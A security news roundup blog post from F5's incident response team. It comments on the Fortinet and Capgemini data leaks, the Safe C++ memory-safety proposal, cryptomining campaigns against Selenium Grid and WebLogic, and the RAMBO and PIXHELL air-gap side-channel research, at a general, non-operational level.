Leaks & breaches, memory-safe C++, cryptominers and bridging the air-gap

Hello! AaronJB from the F5 Security Incident Response Team back with you as your editor, looking back at the news from the week of September 8th through 14th; as always, the week was packed with news from leaks of confidential information to new Tactics, Techniques and Procedures (TTPs) for known adversaries and more. Let's take a quick look at the notable stuff, and I'll throw in a couple of articles from my own "special interest" collection of hardware vulnerabilities.

A week of leaks

There were two high profile leaks of confidential information in the news last week: one from Capgemini and one from Fortinet. What caught my eye this time is the size of the breaches, but not in the way you'd expect. We've become quite used, recently, to giant 'breaches' being dropped with billions of records, hundreds of Gb per breach, but many of these giant breaches - like the Mother of All Breaches (MOAB) from Tencent - turn out to have huge overlap with previous breaches and, personally, I've become quite desensitized to the emails from https://haveibeenpwned.com/ letting me know my details are "out there" because, well, my details have been "out there" so many times before!

If you have some basics in place, the risk from PII leaks is mostly reduced to extremely convincing phishing attacks (not to diminish the risk of phishing attacks, they're arguably the #1 way to compromise any given target):

  • Credit monitoring or, better still, a locked credit file to mitigate the risk of identity theft
  • Unique passwords and a password manager to mitigate the risk of stolen passwords
  • 2FA/MFA enforced on as many sites & applications as possible, again mitigating the risk of stolen passwords and somewhat mitigating the risk of phishing & account takeover (you have to be alert for someone phishing the token from you, of course, and many sites still use SMS as the second factor which is vulnerable to SIM-swapping)

Anyway, back to the breaches from last week! What caught my eye was how small they sounded. Fortinet stated the breach was "limited" in size while the Capgemini dump was "only" 20GB, so it's all fine, right?

Well, when you dig further, the Fortinet breach turned out to allegedly be 400GB of customer data stolen from an S3 bucket, while the Capgemini dump contained source code, private keys, employee credentials, and customer data in the form of virtual machine logs. Those kinds of leaks are much, much harder to deal with as someone impacted - once your source code is out, it's out there, there's no changing of passwords that will help you here - it means attackers can start digging for 0days, build malicious versions of your toolsets and try to phish them onto systems (is there a term for that? We have phishing, smishing, qishing.. what's it called when you send someone a phishing email that entices them to download and install your malicious "update"? dishing? Sorry, sorry, back on topic!), maybe work out how to intercept communications or leverage configuration channels once they're into a network where your software is deployed? The list is endless and worrying. Keys, at least, can be rotated (although painful for most organisations) as can employee credentials, but the reputational impact of losing your customer data? Ouch.

Let me be clear - I am not dunking on Fortinet or Capgemini here because I know we all live in glass houses when it comes to security. One small slip by one person can, in the right circumstances, be all it takes for an attacker to breach an organisation - which is why we take the security of F5 so very seriously; we all know restrictions on our individual freedoms (I'm talking about corporate workstations, here!) are a pain, and there is definitely a balance to be had between security & functionality, but given the vast amounts of customer data we hold in F5 we have to accept a degree of pain to ensure we're doing the most we can to secure that data. So for those outside F5 reading this, rest assured we take security & privacy very seriously with regular training for all employees, strict endpoint security enforced, MFA for everything and so on. I'm sure Fortinet and Capgemini do the same, which further goes to show that we all live in glass houses.

Move over Rust, C++ wants to be the new memory-safe darling

So if phishing (above) is the most common route in to a target organisation, what's the second? Bugs! Bugs in code coupled with the ubiquity of memory-unsafe languages like C and C++ mean that many simple bugs can turn into a vector for exploitation. When the onus is on the developer to ensure the code never tries to read or write out-of-bounds, that memory allocated is always freed (and not used again) and so on, the possibilities for vulnerabilities are endless.

What's the alternative? There are many memory-safe languages available now - some of which have been available for 20+ years - like Java, Python, Swift and more recently Go & Rust - while Java is incredibly popular it also doesn't have a reputation for speed, exactly (Java being 110th fastest at solving for primes) so it never saw widespread adoption for things that needed ultimate speed on the platform (like BIG-IP!) where the closer you can get to the bare metal, the faster you go.. on the flip side, assembly language isn't the best tool for a huge project (like BIG-IP) so the industry sort of settled on C & C++... enter, Rust! I'm not sure why Go didn't become the memory-safe darling when it has been available for a decade longer than Rust, but in the last year or so Rust has started making waves with companies like Microsoft replacing C code wholesale entirely because it is memory-safe and easily removes a whole class of vulnerabilities without any effort on the part of the developer.

Of course, Rust is not without its own vulnerabilities as we saw earlier this year, but the same can be said of C & C++s standard libraries.. still, the C++ community has responded and understands the need for modernization; Rust is a new language and the existing pool of developers in the workforce know C++ with the differences between the languages making migration difficult, so sure it is better to extend C++ to make it memory-safe?

Enter the Safe C++ proposal. Hopefully, as others have written, this will allow a much more rapid pace of adoption for memory-safe practices, eliminating a huge attack surface and making everyone's lives that much easier and secure. In fact, I would hope that Safe C++ would allow automated tooling to convert existing code from C++ to Safe C++. It is a case of time will tell on this one; the tools and compilers existing is just one part of the puzzle, of course, companies will still have to invest in the time to convert their code, and what company wants to spend time doing that when they could be adding shiny new features to their existing codebase instead?

Mining, always mining

I don't know why this always surprises me; I thought there would be better things to do with compromised systems than just mine cryptocurrency (like pivoting elsewhere in the target) but perhaps compromised systems are so commodity now that the best thing to do is mine tiny amounts of crypto on thousands (or more) of systems and take the cash? Either way, last week saw two crypto mining campaigns discovered; one targeting Selenium Grid servers and the other targeting Oracle Weblogic, so check out those writeups if you use either.

Bridging the air-gap

One last pair of articles; the reality is that these two attacks will appear in very few people's threat models - there are just easier ways to steal information from most people (we're back to phishing again), but for people who work in extremely sensitive environments where air-gapping (the practice of physically separating a system from all others - no networking, no wireless connectivity etc) is prevalent might want to take a look. These always pique my interest because one of the earliest security topics I learned about was TEMPEST - at the time I was a young teen and my father worked in the Royal Air Force so I spent some time on base knocking about the med centre where he was chief medic. I learned about Tempest when all the windows were upgraded with shielding and my dad explained why.. as a young computer nerd, it was fascinating!

Although the research which led to the TEMPEST standards started in the 1940s, we are still discovering new and novel ways of inferring digital information from leaked emissions.

First up, RAMBO ("Radiation of Air-gapped Memory Bus for Offense"), which allows an attacker with a simple software defined radio (SDR) to steal information from a nearby system by way of the radio signals leaked by the air-gapped system's RAM; if an attacker could install malware on the target system (hello, Stuxnet!) then that malware could leverage the resulting side-channel to exfiltrate sensitive information to a nearby system. Pretty neat, and slightly more direct than your classic "sniff the VGA/HDMI/DVI cable", too.

Next up, PIXHELL. Unlike the classic attack I just mentioned - where a radio receiver sniffs the radio frequency emissions leaked from the display cables - this attack leverages the audio leaked by the coils & capacitors in the screen to reconstruct information injected by malware on the target air-gapped system. Hands up everyone whose hearing is still good enough to detect "coil whine" from electronic components? Actually, my first thought when I read this research was about my Dell docking station, which screeches and screams (I'm exaggerating, but there is a lot of load-dependent coil whine!) at me as I work. I wonder what digital secrets it is leaking (quite audibly, too!) to anyone listening...

Hardware layer attacks like this have a special interest to me, which is why I often find myself writing about them (see also: Rowhammer, SPECTRE, MELTDOWN etc etc) even though I know they are not "real world" threats for most of us. Still, I hope you enjoyed the commentary nonetheless!

'till next time..

Published Sep 20, 2024
Version 1.0